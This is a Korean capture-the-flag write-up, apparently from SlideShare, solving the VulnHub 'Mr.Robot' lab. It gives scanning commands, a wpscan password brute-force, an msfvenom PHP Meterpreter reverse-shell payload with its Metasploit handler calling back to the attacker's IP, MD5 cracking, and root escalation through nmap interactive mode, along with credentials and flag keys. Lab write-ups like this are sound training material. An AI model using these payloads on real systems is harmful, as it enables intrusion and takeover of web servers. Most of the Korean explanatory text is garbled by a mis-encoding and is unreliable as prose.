際際滷

際際滷Share a Scribd company logo
Mr.Robot CTF Write-Up
- Find three keys -
by Alchemic
(KoreaTech 伎誤)
2
Mr.Robot CTF Write-Up
https://www.vulnhub.com/entry/mr-robot-1,151/
 覓語 覈危 CTF 覓語 譴 .
 URL襦  覃 VM企語襯 れ企 覦  給.
(filetype : ova)
3
Mr.Robot CTF Write-Up
覓語 る 覩瑚記朱 [Mr.Robot]  覦郁化朱 襷 覓語手 給.
覈  VM企語襯 ろ貅 覓伎語 覿螻  螳 蟆讌 るゼ
谿城 蟆.
るジ 碁 譯殊伎讌 給.
4
Mr.Robot CTF Write-Up
Vmware襯 伎 ろる Ubuntu 蠍磯 襴り ろ覃,
れ螻 螳 襦蠏語 覃伎 蟆 .
豌ろる 企 觜覦覯碁ゼ 覈襯願鍵 覓語 襴 襦蠏語語
  給.
5
Mr.Robot CTF Write-Up
覈危轟 讌蠍一  Attacker victim 蟆曙 危エ覲企 れ螻 螳給.
Attacker : Kali Linux 2.0 (螻糾鴬 ろ)
Victim : Ubuntu Linux 14.04.2 LTS (狩伎 ろ)
覲 Write-Up Kali Linux  企れ 伎 讌給.
 (Using Tools)
 Zenmap (Nmap GUI Version)
 Nikto
 WPscan
 Metasploit
6
Mr.Robot CTF Write-Up
覲 write-up 螻糾鴬 ろ螻 狩伎 ろ 螳 ろ語 襷 螻
り 螳 螻 讌 給.
(覲 write-up  ろ語  : 192.168.238.***)
螻糾鴬 狩伎 ろ 螳 ろ語 襷  譴企襦 IP 譯殊  螳
 蟆.
襾殊, [ifconfig] 覈轟企ゼ 伎 螻糾鴬 IP 譯殊襯 願, 企麹 IP 譯殊 
  ろ語 語ろ れ 讌覃 狩伎 ろ IP 譯殊襯   
蟆.
谿襦襦 讌 覃 れ螻 螳 狩伎 ろ IP 譯殊襯  覦 れ 牛 企
觜るゼ 螻牛螻 讌襯   給.
ろ語 語ろ れ nmap 伎 讌覃 .
#nmap A [谿場 IP 譯殊  ] (ex. #nmap A 192.168.121.*)
轟 Zenmap 伎 nmap 覈轟 覲企 螳ク蟆 伎  給.
7
Mr.Robot CTF Write-Up
覲 write-up Zenmap 伎 伎 ろ語 語ろ れ 讌給.
8
Mr.Robot CTF Write-Up
企 狩伎 語ろ語 IP 譯殊螳 [192.168.238.135] 朱 蟆   給.
 80覯 語 443覯 瑚 企れ朱襦, HTTP/HTTPS 觜り ろ 譴企朱
蟆   螻, 企ゼ 牛  覯螳  譴企朱 蟆 豢  給.
 觚殊一襯 伎  企.
9
Mr.Robot CTF Write-Up
伎 企 覲企れ 螻 企 豬曙 讌襯 誤蠍  [nikto] 伎
伎 譟一.
#nikto h 192.168.238.135
10
Mr.Robot CTF Write-Up
襾殊, robots.txt 殊 誤企慨襦 蟆給.
覲危 robots.txt 殊 蟆 語 覈れ 企°.
企ゼ 誤覃 るゼ 谿城 蟆  襯 谿場   蟆.
[fsocity.dic] 企朱 (Dictionary File)螻 [key-1-of-3.txt] 殊 覦蟆  螻,
[key-1-of-3.txt] 殊 牛 豌 覯讌 るゼ 覦蟆  給.
11
Mr.Robot CTF Write-Up
The First Key is...
073403c8a58a1f80d943455fb30724b9
12
Mr.Robot CTF Write-Up
れ朱 [fsocity.dic] 殊 誤企慨蟆給.
 (Dictionary File)襦  蟆 誤  給.
13
Mr.Robot CTF Write-Up
  殊  企螳   朱襦, 覩碁Μ れ企 覦給.
#wget http://192.168.238.135/fsocity.dic
14
Mr.Robot CTF Write-Up
[robots.txt] 殊 譟一朱, 伎 蟯襴 襦蠏語 伎襯 譟一企慨襦 .
蟯襴 伎襦  .
15
Mr.Robot CTF Write-Up
[fsocity.dic] 殊   企れ 企襦 レ 螻  れ(1234)襯
レ 企慨, れ螻 螳 蟆郁骸螳 給.
企螳 語朱 襷 企螳 手  覃讌 伎 豢ル覃, 企螳
襷朱 企 れ螳 殊讌 り 伎 豢レ  蟆 誤 
給.
16
Mr.Robot CTF Write-Up
譟伎 企 Elliot 谿場朱襦, [fsocity.dic]  伎 Elliot企朱 企
襷 れ襯 谿剰鍵  [wpscan] 伎 伎.
#wpscan --url http://192.168.238.135 --wordlist [fsocity.dic path] --username Elliot
17
Mr.Robot CTF Write-Up
ID : Elliot & PW : ER28-0652
企 觜覦覯碁ゼ 谿場朱 蟯襴 伎 襦蠏語語 .
18
Mr.Robot CTF Write-Up
蟯襴 伎 給!
伎 覓伎企 企骸   蟆.
企 螳 螳 伎讌 覲  給.
19
Mr.Robot CTF Write-Up
蟯襴 伎 襦蠏語語 朱 伎 覦焔  襦蠍 伎 れ
螻牛 蠏語 譴 [WP File Manager]襯 れ.
企ゼ 牛 螳蟆 殊 襦   蟆 .
20
Mr.Robot CTF Write-Up
覦焔  襷り鍵  [msfvenom] .
#msfvenom p php/meterpreter_reverse_tcp lhost=(Attacker IP Address) lport=4444
-f raw > shell.php
企蟆 覈轟企ゼ ロ伎 [shell.php] 朱 覦焔  殊 燕.
(朱 るゴ蟆 覲蟆渚  給.)
21
Mr.Robot CTF Write-Up
燕 [shell.php] 殊 蟯襴 伎襯 牛伎 覯襦 襦襯 .
22
Mr.Robot CTF Write-Up
襦 殊 蟆暑襯 誤螻 螻糾鴬 ろ
覦焔企 蠍  [msfconsole] ろ.
(metasploit )
23
Mr.Robot CTF Write-Up
[msf] 襦 螻糾鴬蠍   覈轟企れ ロ 螻糾鴬 れ 讌.
> use exploit/multi/handler
> set payload php/meterpreter_reverse_tcp
> set lport 4444
> set lhost 192.168.238.134
> exploit j -z
伎 襦 [shell.php]襦 蠏殊 覃 螻糾鴬 ろ 螳蟆 覩誤壱襴 
(Meterpreter Shell)   蟆 .
  牛 襴 覈轟(Linux Command)襯 ロ  蟆 .
螳蟆 [sysinfo] [ls] 覈轟企ゼ ロ 覲企れ 誤企.
襦 豺 炎概 蟆 誤  給.
24
Mr.Robot CTF Write-Up
25
Mr.Robot CTF Write-Up
 蟆暑(Home path)襦 企 伎 企  启螳 讌襯 誤.
 譴 robot 企朱 襯 谿場給.
robot 启襦 れ願 企 朱れ 讌襯 誤企慨蟆給.
 覯讌 key 手骸 れ 殊 谿場給!
26
Mr.Robot CTF Write-Up
蠏碁 覩誤壱襴 (Meterpreter Shell) key 殊 覦襦   り .
企 覓語語  覈襯願讌襷 朱 朱語(Permission) 覓語 蟆 螳給.
一 れ 殊 襾殊 危エ覺.
れ 殊 robot企朱  れ螳 md5 hash襦  給.
c3fcd3d76192e4007dfb496cca67e13b
 md5 hash 螳 覓伎語 覲企襦 蟆給.
27
Mr.Robot CTF Write-Up
蟲蠍 蟆(Google Search) 伎覃 所 md5 hash crack 伎襯 谿場  給.
 伎 譴  螻褐 hash cracking 企慨覃 plain text襯 詞  給.
Md5 hash : c3fcd3d76192e4007dfb496cca67e13b
Plain text : abcdefghijklmnopqrstuvwxyz
企蟆 れ襯 谿場  給.
れ蟾讌 朱襦 伎 覲瑚鴬朱 襴れ 襦蠏語語 .
28
Mr.Robot CTF Write-Up
robot 襦 襦蠏語語 炎概給!
伎 key 殊 谿場 伎 誤企慨襦 .
29
Mr.Robot CTF Write-Up
 覯讌 Key 殊 谿場給!
We found it!
30
Mr.Robot CTF Write-Up
The Second Key is...
822c73956184f694993bede3eb39f959
伎 襷讌襷!  覯讌 るゼ 谿場朱  狩.
 robot 企朱 襦 襦蠏語語  企襦 企ゼ root襦 覦蠖 れ願覲企襦
蟆給.
朱 root 螻 启襦 れ願覲企襦 蟆給.
朱語 蟇磯(Permission denied) 覃讌螳 豢ル.
伎 覲企 轟壱 蟆郁骸.
伎 root 蟠(root permission) (Get) 謂 企至 讌 伎 蟾?
31
Mr.Robot CTF Write-Up
32
Mr.Robot CTF Write-Up
[nmap] interactive mode 襯 伎覃 .
(reference : https://www.exploit-db.com/papers/18168/)
interactive 覈  ろ貅 root 蟠朱 螳   蟠  豬曙
(Privilege Escalation Vulnerability) 譟伎.
磯殊 interactive 覈襯 燕り 蠍一  ろる 覦襦 root 蟠朱
願  る 蟆.
企ゼ 伎 襯 企慨襦 蟆給.
33
Mr.Robot CTF Write-Up
 ろ貅一給.
whoami 覈轟企ゼ 伎  企 襦 襦蠏語 伎讌 誤企慨蟆給.
34
Mr.Robot CTF Write-Up
炎概朱 root 蟠朱 蟠 轟 企伎給!
(root privilege escalation success!)
蠏碁Μ螻 /root 襴(Directory)  覯讌 るゼ 覦蟆  給!
35
Mr.Robot CTF Write-Up
The Third Key is...
04787ddef27c3dee1ee161b21670b4e4
Thank You!
Contact
sehands@koreatech.ac.kr

More Related Content

Mr.Robot CTF Write-Up (Korean version)

  • 1. Mr.Robot CTF Write-Up - Find three keys - by Alchemic (KoreaTech 伎誤)
  • 2. 2 Mr.Robot CTF Write-Up https://www.vulnhub.com/entry/mr-robot-1,151/ 覓語 覈危 CTF 覓語 譴 . URL襦 覃 VM企語襯 れ企 覦 給. (filetype : ova)
  • 3. 3 Mr.Robot CTF Write-Up 覓語 る 覩瑚記朱 [Mr.Robot] 覦郁化朱 襷 覓語手 給. 覈 VM企語襯 ろ貅 覓伎語 覿螻 螳 蟆讌 るゼ 谿城 蟆. るジ 碁 譯殊伎讌 給.
  • 4. 4 Mr.Robot CTF Write-Up Vmware襯 伎 ろる Ubuntu 蠍磯 襴り ろ覃, れ螻 螳 襦蠏語 覃伎 蟆 . 豌ろる 企 觜覦覯碁ゼ 覈襯願鍵 覓語 襴 襦蠏語語 給.
  • 5. 5 Mr.Robot CTF Write-Up 覈危轟 讌蠍一 Attacker victim 蟆曙 危エ覲企 れ螻 螳給. Attacker : Kali Linux 2.0 (螻糾鴬 ろ) Victim : Ubuntu Linux 14.04.2 LTS (狩伎 ろ) 覲 Write-Up Kali Linux 企れ 伎 讌給. (Using Tools) Zenmap (Nmap GUI Version) Nikto WPscan Metasploit
  • 6. 6 Mr.Robot CTF Write-Up 覲 write-up 螻糾鴬 ろ螻 狩伎 ろ 螳 ろ語 襷 螻 り 螳 螻 讌 給. (覲 write-up ろ語 : 192.168.238.***) 螻糾鴬 狩伎 ろ 螳 ろ語 襷 譴企襦 IP 譯殊 螳 蟆. 襾殊, [ifconfig] 覈轟企ゼ 伎 螻糾鴬 IP 譯殊襯 願, 企麹 IP 譯殊 ろ語 語ろ れ 讌覃 狩伎 ろ IP 譯殊襯 蟆. 谿襦襦 讌 覃 れ螻 螳 狩伎 ろ IP 譯殊襯 覦 れ 牛 企 觜るゼ 螻牛螻 讌襯 給. ろ語 語ろ れ nmap 伎 讌覃 . #nmap A [谿場 IP 譯殊 ] (ex. #nmap A 192.168.121.*) 轟 Zenmap 伎 nmap 覈轟 覲企 螳ク蟆 伎 給.
  • 7. 7 Mr.Robot CTF Write-Up 覲 write-up Zenmap 伎 伎 ろ語 語ろ れ 讌給.
  • 8. 8 Mr.Robot CTF Write-Up 企 狩伎 語ろ語 IP 譯殊螳 [192.168.238.135] 朱 蟆 給. 80覯 語 443覯 瑚 企れ朱襦, HTTP/HTTPS 觜り ろ 譴企朱 蟆 螻, 企ゼ 牛 覯螳 譴企朱 蟆 豢 給. 觚殊一襯 伎 企.
  • 9. 9 Mr.Robot CTF Write-Up 伎 企 覲企れ 螻 企 豬曙 讌襯 誤蠍 [nikto] 伎 伎 譟一. #nikto h 192.168.238.135
  • 10. 10 Mr.Robot CTF Write-Up 襾殊, robots.txt 殊 誤企慨襦 蟆給. 覲危 robots.txt 殊 蟆 語 覈れ 企°. 企ゼ 誤覃 るゼ 谿城 蟆 襯 谿場 蟆. [fsocity.dic] 企朱 (Dictionary File)螻 [key-1-of-3.txt] 殊 覦蟆 螻, [key-1-of-3.txt] 殊 牛 豌 覯讌 るゼ 覦蟆 給.
  • 11. 11 Mr.Robot CTF Write-Up The First Key is... 073403c8a58a1f80d943455fb30724b9
  • 12. 12 Mr.Robot CTF Write-Up れ朱 [fsocity.dic] 殊 誤企慨蟆給. (Dictionary File)襦 蟆 誤 給.
  • 13. 13 Mr.Robot CTF Write-Up 殊 企螳 朱襦, 覩碁Μ れ企 覦給. #wget http://192.168.238.135/fsocity.dic
  • 14. 14 Mr.Robot CTF Write-Up [robots.txt] 殊 譟一朱, 伎 蟯襴 襦蠏語 伎襯 譟一企慨襦 . 蟯襴 伎襦 .
  • 15. 15 Mr.Robot CTF Write-Up [fsocity.dic] 殊 企れ 企襦 レ 螻 れ(1234)襯 レ 企慨, れ螻 螳 蟆郁骸螳 給. 企螳 語朱 襷 企螳 手 覃讌 伎 豢ル覃, 企螳 襷朱 企 れ螳 殊讌 り 伎 豢レ 蟆 誤 給.
  • 16. 16 Mr.Robot CTF Write-Up 譟伎 企 Elliot 谿場朱襦, [fsocity.dic] 伎 Elliot企朱 企 襷 れ襯 谿剰鍵 [wpscan] 伎 伎. #wpscan --url http://192.168.238.135 --wordlist [fsocity.dic path] --username Elliot
  • 17. 17 Mr.Robot CTF Write-Up ID : Elliot & PW : ER28-0652 企 觜覦覯碁ゼ 谿場朱 蟯襴 伎 襦蠏語語 .
  • 18. 18 Mr.Robot CTF Write-Up 蟯襴 伎 給! 伎 覓伎企 企骸 蟆. 企 螳 螳 伎讌 覲 給.
  • 19. 19 Mr.Robot CTF Write-Up 蟯襴 伎 襦蠏語語 朱 伎 覦焔 襦蠍 伎 れ 螻牛 蠏語 譴 [WP File Manager]襯 れ. 企ゼ 牛 螳蟆 殊 襦 蟆 .
  • 20. 20 Mr.Robot CTF Write-Up 覦焔 襷り鍵 [msfvenom] . #msfvenom p php/meterpreter_reverse_tcp lhost=(Attacker IP Address) lport=4444 -f raw > shell.php 企蟆 覈轟企ゼ ロ伎 [shell.php] 朱 覦焔 殊 燕. (朱 るゴ蟆 覲蟆渚 給.)
  • 21. 21 Mr.Robot CTF Write-Up 燕 [shell.php] 殊 蟯襴 伎襯 牛伎 覯襦 襦襯 .
  • 22. 22 Mr.Robot CTF Write-Up 襦 殊 蟆暑襯 誤螻 螻糾鴬 ろ 覦焔企 蠍 [msfconsole] ろ. (metasploit )
  • 23. 23 Mr.Robot CTF Write-Up [msf] 襦 螻糾鴬蠍 覈轟企れ ロ 螻糾鴬 れ 讌. > use exploit/multi/handler > set payload php/meterpreter_reverse_tcp > set lport 4444 > set lhost 192.168.238.134 > exploit j -z
  • 24. 伎 襦 [shell.php]襦 蠏殊 覃 螻糾鴬 ろ 螳蟆 覩誤壱襴 (Meterpreter Shell) 蟆 . 牛 襴 覈轟(Linux Command)襯 ロ 蟆 . 螳蟆 [sysinfo] [ls] 覈轟企ゼ ロ 覲企れ 誤企. 襦 豺 炎概 蟆 誤 給. 24 Mr.Robot CTF Write-Up
  • 25. 25 Mr.Robot CTF Write-Up 蟆暑(Home path)襦 企 伎 企 启螳 讌襯 誤. 譴 robot 企朱 襯 谿場給. robot 启襦 れ願 企 朱れ 讌襯 誤企慨蟆給. 覯讌 key 手骸 れ 殊 谿場給!
  • 26. 26 Mr.Robot CTF Write-Up 蠏碁 覩誤壱襴 (Meterpreter Shell) key 殊 覦襦 り . 企 覓語語 覈襯願讌襷 朱 朱語(Permission) 覓語 蟆 螳給. 一 れ 殊 襾殊 危エ覺. れ 殊 robot企朱 れ螳 md5 hash襦 給. c3fcd3d76192e4007dfb496cca67e13b md5 hash 螳 覓伎語 覲企襦 蟆給.
  • 27. 27 Mr.Robot CTF Write-Up 蟲蠍 蟆(Google Search) 伎覃 所 md5 hash crack 伎襯 谿場 給. 伎 譴 螻褐 hash cracking 企慨覃 plain text襯 詞 給. Md5 hash : c3fcd3d76192e4007dfb496cca67e13b Plain text : abcdefghijklmnopqrstuvwxyz 企蟆 れ襯 谿場 給. れ蟾讌 朱襦 伎 覲瑚鴬朱 襴れ 襦蠏語語 .
  • 28. 28 Mr.Robot CTF Write-Up robot 襦 襦蠏語語 炎概給! 伎 key 殊 谿場 伎 誤企慨襦 .
  • 29. 29 Mr.Robot CTF Write-Up 覯讌 Key 殊 谿場給! We found it!
  • 30. 30 Mr.Robot CTF Write-Up The Second Key is... 822c73956184f694993bede3eb39f959
  • 31. 伎 襷讌襷! 覯讌 るゼ 谿場朱 狩. robot 企朱 襦 襦蠏語語 企襦 企ゼ root襦 覦蠖 れ願覲企襦 蟆給. 朱 root 螻 启襦 れ願覲企襦 蟆給. 朱語 蟇磯(Permission denied) 覃讌螳 豢ル. 伎 覲企 轟壱 蟆郁骸. 伎 root 蟠(root permission) (Get) 謂 企至 讌 伎 蟾? 31 Mr.Robot CTF Write-Up
  • 32. 32 Mr.Robot CTF Write-Up [nmap] interactive mode 襯 伎覃 . (reference : https://www.exploit-db.com/papers/18168/) interactive 覈 ろ貅 root 蟠朱 螳 蟠 豬曙 (Privilege Escalation Vulnerability) 譟伎. 磯殊 interactive 覈襯 燕り 蠍一 ろる 覦襦 root 蟠朱 願 る 蟆. 企ゼ 伎 襯 企慨襦 蟆給.
  • 33. 33 Mr.Robot CTF Write-Up ろ貅一給. whoami 覈轟企ゼ 伎 企 襦 襦蠏語 伎讌 誤企慨蟆給.
  • 34. 34 Mr.Robot CTF Write-Up 炎概朱 root 蟠朱 蟠 轟 企伎給! (root privilege escalation success!) 蠏碁Μ螻 /root 襴(Directory) 覯讌 るゼ 覦蟆 給!
  • 35. 35 Mr.Robot CTF Write-Up The Third Key is... 04787ddef27c3dee1ee161b21670b4e4